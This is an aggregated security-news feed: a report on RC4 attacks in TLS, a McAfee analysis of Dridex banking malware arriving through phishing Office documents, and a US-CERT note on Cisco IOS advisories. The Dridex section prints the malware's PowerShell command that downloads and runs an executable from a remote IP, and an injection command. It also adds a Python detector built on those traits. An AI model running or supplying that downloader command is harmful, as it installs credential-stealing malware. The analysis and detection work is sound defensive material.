Noose around Internet’s TLS system tightens with 2 new decryption attacks

The noose around the neck of the Internet's most widely used encryption scheme got a little tighter this month with the disclosure of two new attacks that can retrieve passwords, credit card numbers and other sensitive data from some transmissions protected by secure sockets layer and transport layer security protocols.

Both attacks work against the RC4 stream cipher, which is estimated to encrypt about 30 percent of today's TLS traffic. Cryptographers have long known that some of the pseudo-random bytes RC4 uses to encode messages were predictable, but it wasn't until 2013 that researchers devised a practical way to exploit the shortcoming. The result was an attack that revealed small parts of the plaintext inside an HTTPS-encrypted data stream.

Now, researchers have figured out refinements that allow them to recover RC4-protected passwords with a 50-percent success rate using slightly more than 67 million (2^26) encryptions, a two-order-of-magnitude reduction over the previous attack used to recover secure cookies. The exploits—laid out in a paper published last week titled "Attacks Only Get Better: Password Recovery Attacks Against RC4 in TLS"—work against both Basic access authentication over HTTPS and the widely used IMAP protocol for retrieving and storing e-mail.


‘Banking’ Malware Dridex Arrives via Phishing Email

Microsoft Office scripting malware has become more and more common and aggressive lately as malware authors constantly develop new techniques to evade detection and deceive users.

This kind of malware, as mentioned in previous posts, usually arrives as an attached document within a phishing email. After the “document” is opened, it downloads the second-stage payload, which downloads and executes the final payload that infects the host machine.

In a recent case involving the Dridex malware, McAfee Labs found the distribution method to be typical: The malware arrives via a phishing email:

Office Powershell - e-mail

We have discovered that the attached document can arrive in one of two variants:

  • The first variant comes as an XML document (.XML or .DOC) containing an embedded, base64-encoded Office object. The object is decoded and executed when the XML file is opened.
    Office Powershell - XML

    The embedded ActiveMime object contains an encrypted OLE document that is decrypted and executed just after the Office object is opened by the XML file.
    Office PowerShell - ActiveMime
    The OLE file then executes a malicious embedded macro that contains code similar to what we see in the following image. This code executes PowerShell and downloads the Dridex Loader.
    Office Powershell - Macro
  • The second variant comes as a Word or Excel file (.DOC or .XLS) that contains an Office Active Object which executes the malicious code in the OLE file as native OLE code.
    Office Powershell - OLE Native
    Thus, even if the user has not enabled the execution of macros, the malware can execute by running the malicious code directly from the OLE file. To deceive the user, the malware presents a document file with an Active Object embedded. As shown in the following images, the user is warned about opening malicious Active Objects, similar to the warning displayed whenever a user tries to open a document containing an embedded macro:
    Office Powershell - Opening Attachment
    Office Powershell - Excel downloader
    An incautious user might open the embedded Active Object by ignoring the warning and double-clicking the object. In this case, the downloader code will run by executing a PowerShell instance, as in the previous variant.

In either case, the embedded malicious code will execute a command-line instruction that runs powershell.exe with the following parameters:

Office Powershell - Powershell

  • cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp:// 62.76.41.15 /asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

The preceding code will run only if powershell.exe is installed on the system. (The malicious URL has been edited for safety.)
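As an added example (not McAfee's code), the following Python triages constructed process-creation log lines for the Office-to-shell downloader pattern described above: an Office parent spawning cmd.exe or powershell.exe with the "-ExecutionPolicy bypass", "-noprofile", WebClient.DownloadFile, and expand/start-from-%TEMP% traits. The "timestamp|parent|image|command line" log format, the field names, and the 198.51.100.7 address are assumptions.

```python
import re

# Constructed process-creation events (hypothetical "timestamp|parent|image|command line"
# format, not McAfee's). The URL is defanged and the IP is a documentation address.
SAMPLE_EVENTS = [
    r"2015-03-27T10:02:11Z|WINWORD.EXE|cmd.exe|cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
    r"(New-Object System.Net.WebClient).DownloadFile('hxxp://198.51.100.7/asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); "
    r"expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;",
    r"2015-03-27T10:03:40Z|explorer.exe|powershell.exe|powershell.exe -NoProfile -File C:\Scripts\inventory.ps1",
    r"2015-03-27T10:05:02Z|EXCEL.EXE|cmd.exe|cmd /c echo hello",
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

# Command-line traits of the downloader described in the post; each match is one point.
INDICATORS = {
    "execpolicy_bypass": re.compile(r"-executionpolicy\s+bypass", re.I),
    "noprofile": re.compile(r"-noprofile\b", re.I),
    "webclient_download": re.compile(r"System\.Net\.WebClient\)\.DownloadFile\(", re.I),
    "expand_in_temp": re.compile(r"\bexpand\s+%temp%", re.I),
    "start_from_temp": re.compile(r"\bstart\s+%temp%", re.I),
}

def parse_event(line):
    ts, parent, image, cmdline = line.split("|", 3)
    return {"ts": ts, "parent": parent.lower(), "image": image.lower(), "cmdline": cmdline}

def score_event(ev):
    """Return (score, reasons). An Office parent spawning a shell is worth two points on its own."""
    reasons = []
    if ev["parent"] in OFFICE_PARENTS and ev["image"] in SHELLS:
        reasons.append("office_spawns_shell")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
    score = len(reasons) + (1 if "office_spawns_shell" in reasons else 0)
    return score, reasons

def triage(lines, threshold=3):
    """Flag events whose score reaches the threshold; returns [(timestamp, score, reasons)]."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["ts"], score, reasons))
    return hits

if __name__ == "__main__":
    for ts, score, reasons in triage(SAMPLE_EVENTS):
        print(ts, score, ", ".join(reasons))
```

Only the first constructed event is flagged: the benign scheduled PowerShell script (explorer.exe parent, one trait) and the Excel-spawned "echo" (Office parent, no traits) stay below the threshold.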

After executing this code, the malware downloads and executes the Dridex loader, which downloads and installs the Dridex DLL on the system.

Office PowerShell - Powershell downloader traffic

Office Powershell - Dridex Running

This DLL is injected into explorer.exe by running the following command:

  • rundll32.exe "C:\XX.tmp" NotifierInit

After executing this command, Dridex installs itself on the system, rundll32.exe is terminated, and the host is infected. The malware then contacts its control server(s) to report the infection.

Dridex is “banker” malware that can steal user credentials for online accounts; it is derived from Cridex. Both are part of the GameOver Zeus malware family.

The following control servers were contacted by the malware during our research. We recommend blocking the following IPs:


McAfee products detect this malware and its payload with the following detection names:

  • W97M downloaders: W97M/Downloader.aen, W97M/Downloader.aev, W97M/Downloader.afc, X97M/Downloader
  • Dridex downloader (loader): Downloader-FAQM, Downloader-FAQZ
  • Dridex 32/64-bit: PWS-Dridex

The post ‘Banking’ Malware Dridex Arrives via Phishing Email appeared first on McAfee.

Cisco Releases Semiannual IOS Software Security Advisory Bundled Publication

Original release date: March 26, 2015

Cisco has released its semiannual Cisco IOS Software Security Advisory Bundled Publication. This publication includes seven Security Advisories that address vulnerabilities in Cisco IOS Software. Exploits of these vulnerabilities could result in a denial of service (DoS) condition, interface queue wedge, or exchange memory leak.

US-CERT encourages users and administrators to review the following Cisco Security Advisory and apply the necessary updates.